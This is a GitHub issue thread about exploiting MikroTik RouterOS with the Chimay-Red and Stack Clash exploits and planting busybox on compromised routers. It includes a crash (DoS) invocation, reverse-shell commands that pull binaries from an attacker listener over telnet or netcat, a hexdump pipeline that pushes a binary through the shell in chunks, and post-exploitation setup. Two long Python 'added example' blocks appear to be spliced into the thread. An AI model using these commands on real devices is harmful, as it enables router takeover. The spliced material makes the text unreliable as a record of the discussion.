Open jinyu00 opened 6 years ago
I think this request is out of the scope of this repo.
You can list files using echo *.
Other basic commands are present.
I think it's possible to download busybox using telnet as a fake http client.
Good luck ;-)
Hi BigNerd, the question is how to upload a busybox or tinyshell remotely and create the rc.d, run.d and the bash file without mounting the sda. Stack Clash x86 depends on the binaries that come with busybox to create a reverse shell; you said it is possible to download busybox using telnet as a fake http client, or am I wrong? Could you explain a little about this.
Thanks for your great work, greetings! 💪
Look at this line of code: https://github.com/BigNerd95/ASUSddns/blob/master/slim/ASUSddns_slim.sh#L29
I passed the http request to the stdin of netcat. I think it is possible to do a similar thing with telnet (not tested yet).
Anyway, once you have the admin password you can upload any binary file from webfig and then execute it with the reverse shell in the /rw/pckg/ folder.
Or another easy way is to edit the reverse shell command with something like this:
"/bin/telnet 192.168.8.5 1234 > /ram/busybox"
And open netcat on the pc with this: $ nc -l -p 1234 < busybox
This should be able to upload the binary
Thanks for your answer. I did not achieve remote command execution. I have two virtual machines running in Hyper-V with RouterOS v6.32.2 x86, one with busybox inserted and the other one identical but clean, without busybox.
Cool. It is true, this can also work with telnet 🏄
echo $(echo -e -n "GET / HTTP/1.1\r\nHost: api.ipify.org\r\n\r\n" | nc -w 5 api.ipify.org 80 | tail -1)
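The "fake http client" idea above has two halves that the one-liner hides: the hand-built GET request that goes in on stdin, and the fact that whatever comes back over the raw socket starts with a status line and headers, which would land inside the file if the stream were simply redirected to disk. The following is an added example (not code from the thread or from Chimay-Red) showing both halves in Python: the request as nc/telnet would send it, and the response split that a receiver needs. It assumes HTTP/1.1 with a Content-Length body (no chunked encoding) and a server that honours Connection: close, so the socket reaches EOF instead of depending on a read timeout like nc -w 5; the host, port and path are illustrative.

```python
"""Added example: raw-socket HTTP GET and response splitting."""
import socket
from typing import Dict, Tuple


def build_get(host: str, path: str = "/") -> bytes:
    """Minimal request. Connection: close makes the server end the stream,
    which is what a netcat/telnet client needs to terminate cleanly."""
    req = (
        "GET %s HTTP/1.1\r\n"
        "Host: %s\r\n"
        "Connection: close\r\n"
        "\r\n"
    ) % (path, host)
    return req.encode("ascii")


def split_response(raw: bytes) -> Tuple[int, Dict[str, str], bytes]:
    """Separate status line and headers from the body. The body is cut to
    Content-Length when present, so stray trailing bytes from a slow close
    cannot pollute a downloaded binary."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete response: header terminator not found")
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError("bad status line: %r" % lines[0])
    status = int(parts[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "content-length" in headers:
        n = int(headers["content-length"])
        if len(body) < n:
            raise ValueError("short body: got %d of %d bytes" % (len(body), n))
        body = body[:n]
    return status, headers, body


def fetch(host: str, path: str = "/", port: int = 80, timeout: float = 5.0) -> Tuple[int, bytes]:
    """The exchange over a raw TCP socket, what the nc pipeline does by hand;
    returns (status, body) with the headers already stripped."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_get(host, path))
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    status, _, body = split_response(b"".join(chunks))
    return status, body


if __name__ == "__main__":
    # Constructed sample of a server reply; no network needed to try the parser.
    sample = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
              b"Content-Length: 4\r\nConnection: close\r\n\r\n\x7fELF")
    print(split_response(sample))
```

The practical consequence for the router side is that telnet or nc redirected straight to a file only yields a clean binary if the far end sends raw bytes with no HTTP framing at all, which is exactly what the nc -l listener approach later in the thread does.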
Using StackClash_x86:
Direct interaction with Busybox:
Could you test using 6.38.4? Older versions of RouterOS have a different pthread stack size. I already fixed the mips exploit, but I still need to fix the x86 exploit.
Try to make it crash before stack clash
./POCs/CrashPOC.py 192.168.1.10 dos
I uploaded busybox using this:
(Reverse shell command on target)
On PC:
hexdump -v -e '"echo -e -n " 1024/1 "\\\\x%02X" " >> /ram/busybox\n"' busybox-i686 | sed -e "s/\\\\\\\\x //g" | nc -l -q 0 -p 1234
Basically it sends the file as blocks of 1KB and writes it to a file using echo.
Example:
Then you can launch again the reverse shell command and you can find busybox binary in /ram/
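The hexdump pipeline above is the whole transport, so it is worth being able to check the stream before it is fed to the reverse shell. The following is an added example (not code from the thread or from Chimay-Red) that produces the same 1 KB-per-command encoding in Python and, more usefully, replays the commands the way the target shell and its echo -e would, so a lossless round trip can be asserted offline. It assumes the remote shell is bash or busybox ash (an unquoted \\ collapses to \, and echo -e understands \xHH) and that the destination path is writable; /ram/busybox and the sample payload are illustrative values.

```python
"""Added example: chunked echo -e -n upload encoder with a replay check."""
import hashlib
import re
from typing import Dict, List

CHUNK = 1024  # bytes per echo command, as in the hexdump pipeline


def echo_commands(data: bytes, remote_path: str, chunk: int = CHUNK) -> List[str]:
    """One `echo -e -n ... >> path` per chunk. The argument is deliberately
    unquoted, as in the hexdump pipeline, so each byte is spelled \\\\xHH:
    the shell turns \\\\ into \\, then echo -e turns \\xHH into the byte."""
    cmds = []
    for off in range(0, len(data), chunk):
        escaped = "".join("\\\\x%02X" % b for b in data[off:off + chunk])
        cmds.append("echo -e -n %s >> %s" % (escaped, remote_path))
    return cmds


_CMD = re.compile(r"^echo -e -n (\S+) >> (\S+)$")
_HEX_WORD = re.compile(r"^(\\x[0-9A-Fa-f]{2})+$")


def replay(cmds: List[str]) -> Dict[str, bytes]:
    """Simulate the target: unquoted-word backslash handling, then echo -e,
    then append. Returns the bytes each remote path ends up holding."""
    files: Dict[str, bytes] = {}
    for cmd in cmds:
        m = _CMD.match(cmd)
        if not m:
            raise ValueError("not an upload command: %r" % cmd)
        word, path = m.group(1), m.group(2)
        unquoted = re.sub(r"\\(.)", r"\1", word)  # shell: \\ -> \
        if not _HEX_WORD.match(unquoted):
            raise ValueError("argument is not a pure \\xHH string: %r" % unquoted)
        out = bytes(int(h, 16) for h in re.findall(r"\\x([0-9A-Fa-f]{2})", unquoted))
        files[path] = files.get(path, b"") + out
    return files


def transfer_ok(data: bytes, cmds: List[str], remote_path: str) -> bool:
    """Compare the replayed file with the original by sha256. The same digest
    is what to compare against on the target once busybox runs there
    (for example: /ram/busybox sha256sum /ram/busybox)."""
    got = replay(cmds).get(remote_path, b"")
    return hashlib.sha256(got).digest() == hashlib.sha256(data).digest()


if __name__ == "__main__":
    # Constructed stand-in for a busybox binary: the ELF magic followed by
    # every byte value, so NULs, quotes and backslashes are all exercised.
    payload = b"\x7fELF" + bytes(range(256)) * 5
    cmds = echo_commands(payload, "/ram/busybox")
    print("%d commands, round trip ok: %s" % (len(cmds), transfer_ok(payload, cmds, "/ram/busybox")))
```

Because the encoding appends, the destination must not already exist when the first command runs; otherwise the earlier contents stay in front of the binary and the kernel refuses to execute the result as ELF, which makes the shell try to run it as a script instead.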
Really cool I/O pipeline! I will keep it in mind for when I can perform the remote code execution, thanks.
Different versions of python and different versions of terminals.
What happens with cygwin must be a problem in the tty; it is irrelevant.
Apparently CrashPOC only works with python 3. The code seems very simple; can it be a problem in the sockets library?
Tested on Ubuntu server with python 3.x.
I have not tried StackClash_x86 in python 3, since pwntools is written in py 2.7
This was my feedback I hope it's useful Regards!
All my code is for python3. Only StackClash_x86 is for python2, because pwntools works only with py2, but I think I'll convert it to python3 using ropper.
Anyway, I put the shebang in the first line of my scripts, so if you run them directly (eg: ./CrashPoc.py) the correct version of python should be used automatically.
You're right, it happens that I had not made them executable. Excuse my ignorance, and thanks for the information; I did not read the shebang.
I found a fork for python 3 of pwntools https://github.com/arthaud/python3-pwntools
I can upload busybox to the VM on RouterOS 6.35.4 but I don't get how I can get a shell with busybox running.
Thanks for the help in advance.
@SrSands you mean you can connect to the shell but don't know how to use the newly uploaded busybox? I did something like:
chmod +x /rw/pckg/busybox-mips # make executable
alias bb=/rw/pckg/busybox-mips
alias ls='bb ls' # add some shorthands
ls -l
total 2575
-rw-r----- 1 root root 18401 Jan 2 1970 auto-before-reset.backup
-rw-r--r-- 1 root root 535892 Mar 27 23:18 autosupout.old.rif
-rw-r--r-- 1 root root 541016 Mar 27 23:27 autosupout.rif
-rwxr-xr-x 1 root root 1534396 Mar 27 23:43 busybox-mips
drwxr-xr-x 1 root root 2048 Mar 26 19:13 pub
drwxr-xr-x 1 root root 2048 Jan 1 1970 skins
drwxr-xr-x 1 root root 2048 Sep 22 1970 web-proxy1
I think you can add the aliases to startup scripts somehow. Not sure.
The other option is to write softlinks for the commands under /bin
but writing to the NAND is a PITA... and you need to plug cables in and out. Here's a tutorial, haven't tried:
http://blog.rchapman.org/posts/Getting_shell_on_a_RouterBoard/
Also this guy made an automated "jailbreak" that installs busybox and enables devel-login: https://github.com/0ki/mikrotik-tools AFAIK you just run this VM image in lan and follow the instructions (also haven't tested): http://02.lv/f/2018/01/06/MT_JB_0.92.ova
edit
Hmm... so I guess this is their setup script router side: https://github.com/0ki/mikrotik-tools/blob/master/exploit-backup/slave.sh
Basically copy busybox to /flash/bin, make a bunch of softlinks, add it to path. Doesn't the path variable clear after a reboot tho?
Simply copy the new busybox in /flash/bin
Then run
chmod 777 /flash/bin/busybox
/flash/bin/busybox --install -s /flash/bin/
I don't know why you do not read my README.md https://github.com/BigNerd95/Chimay-Red/blob/master/README.md#persistent-telnet-server. This example does all these things automatically for you.
The PATH already contains /flash/bin
So you dont have to add it to the PATH
@BigNerd95 thanks, the telnet upload wasn't working for me so I guess I didn't read past that part ^^;;
Btw I don't have /flash/bin in the PATH?
echo $PATH
/usr/local/bin:/usr/bin:/sbin:/bin
edit
After I did the steps for a persistent install manually, it appeared in PATH :))
I guess it's because the www service had different env vars?
@BigNerd95 Thanks, i didn't pay attention to the reverse telnet but anyway I'm going to try both methods
EDIT
I tried the persistent telnet example but it keeps failing, asking me for the ropper module although I installed it from the git repository. I think it is an error on my end and I'm still working on it (I don't have as much free time as I want).
Thanks for the help @BigNerd95 & @tostercx, but every time that I try to interact with busybox-mips I get:
/flash/bin/busybox-mips: 1: Trying: not found
/flash/bin/busybox-mips: 2: Connected: not found
/flash/bin/busybox-mips: 3: Escape: not found
(that time I was trying the BigNerd example, but with tostercx's I get the same response, only in another directory)
I have the file copied to both directories; doing an echo * shows it.
I don't know what I'm doing wrong. If anyone can help me a little I would be thankful.
If you receive these three "not found" it's normal. Simply ignore them ;)
Then maybe it is a problem with the busybox version, because this is happening:
chmod 777 /flash/bin/busybox-mips
/flash/bin/busybox --install -s /flash/bin/
/bin/bash: /flash/bin/busybox: not found
/flash/bin/busybox-mips --install -s /flash/bin/
/flash/bin/busybox-mips: 1: Trying: not found
/flash/bin/busybox-mips: 2: Connected: not found
/flash/bin/busybox-mips: 3: Escape: not found
ls
/bin/bash: ls: not found
ls -l
/bin/bash: ls: not found
Thanks in advance
export PATH=/flash/bin:$PATH
Getting the same result :(
chmod 777 /flash/bin/busybox-mips
/flash/bin/busybox --install -s /flash/bin/
/bin/bash: /flash/bin/busybox: not found
/flash/bin/busybox-mips --install -s /flash/bin/
/flash/bin/busybox-mips: 1: Trying: not found
/flash/bin/busybox-mips: 2: Connected: not found
/flash/bin/busybox-mips: 3: Escape: not found
export PATH=/flash/bin:$PATH
ls
/bin/bash: ls: not found
ls -l
/bin/bash: ls: not found
Try with: /flash/bin/ls -l
Same result
/flash/bin/ls -l
/bin/bash: /flash/bin/ls: not found
cd /flash/bin
echo *
busybox-mips milo
cd /flash/bin/ls -l
/bin/bash: /flash/bin/ls: not found
cd flash/bin/
echo *
busybox-mips milo
cd /flash/bin/ls -l
/bin/bash: /flash/bin/ls: not found
Now I can run system() by ROP, but I don't know how to exploit it without adding our busybox, because the default busybox only supports a few commands.